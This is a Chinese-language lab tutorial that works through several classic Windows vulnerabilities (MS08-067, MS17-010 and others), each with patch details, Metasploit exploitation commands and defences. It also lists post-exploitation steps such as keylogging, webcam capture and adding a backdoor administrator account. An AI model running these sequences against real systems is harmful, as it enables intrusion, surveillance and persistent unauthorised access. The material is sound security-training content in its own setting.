常见主机漏洞
1.MS08_067
-
利用端口:445
类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE
范围:win2000、xp、server 2003、vista、server 2008、7 Beta
补丁:KB958644
描述:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
-
操作步骤:
环境:kali xp英文版
利用工具 metasploit
命令:
msfconsole search ms08_067 use 0 show options set rhosts xp\'ip show target 34(7) show payloads set payload 44 run/exploit
-
实验补充:
webcam_stream 打开摄像头返回视频流 webcam_snap 打开摄像头返回照片 ps 展示当前运行的进程信息 migrate [pig 号] 切换进程 keyscan_start 开始键盘监听 keyscan_dump 打印监听到的内容 keyscan_stop 结束键盘监听 shell 进入到windows命令行下 whoami 查看当前账户是谁 dir 查看文件 net user hacker 123456/add net localgroup administrators hacker /add rdesktop xp\'ip 打开远程桌面登陆xp
-
防御
方法1:安装补丁
方法2:防火墙关闭445端口
2.MS12_020
-
利用端口:3389(RDP协议)
类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE、拒绝服务漏洞
范围:xp、server 2003、vista、server 2008
补丁:KB2621440
描述:如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码,或造成系统拒绝服务。
-
操作步骤
实验环境 kali、win2003
利用工具:metasploit
命令:
msfconsole search ms12_020 use 1 show options set rhosts win2003\'ip /24 run/exploit search ms12_020 use 0 show options set rhosts win2003\'ip run/exploit
-
防御
方法1:安装补丁
方法2:防火墙关闭3389端口
3.MS11_003
-
利用协议:HTTP协议
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: IE6、IE7、IE8
微软安全公告:KB2482017
漏洞描述:
这些漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。 -
操作步骤
环境:kali win7
工具:metasploit
-
命令:
- msfconsole search ms11_003 use 0 show options set srvhost kali\'ip show options set uripath a exploit/run sessions sessions 1 shell whoami -
防御
方法1:安装补丁
方法2 : 使用其他浏览器的最新版本
4.MS14_064
-
利用协议:HTTP协议
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: windows2003、2008、2012、vista、win7、win8
微软安全公告:KB3010788
漏洞描述:
OLE即对象连接与嵌入技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”彼此进行“连接”的机制。Microsoft Windows处理特制OLE对象文件的方式中存在远程代码执行漏洞,成功利用后可允许攻击者以当前用户权限执行任意代码。 -
操作步骤
环境kali win7
工具 metasploit
命令:
msfconsole search ms14_064 use 0 show options show payloads set payload 50 show options set AllowPowershellPrompt true show options show targets set target 1 show options run sessions sessions 1 shell whoami
-
防御
方法1:安装补丁
方法2 : 不使用IE系列浏览器
5.MS17_010
-
利用协议:SMB
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
微软安全公告:KB4012598、KB4012212、KB4012215
漏洞描述:
如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 -
操作步骤
环境kali win7
工具 metasploit
命令:
msfconsole search ms17_010 use 1 show options set rhosts win7\' ip run search use 2 set rhosts win\'ip run net user hacker 123 /add net localgroup administrators hacker /add ctrl+c rdesktop [win7的ip]
-
防御:
安装补丁
6.heartbleed漏洞
-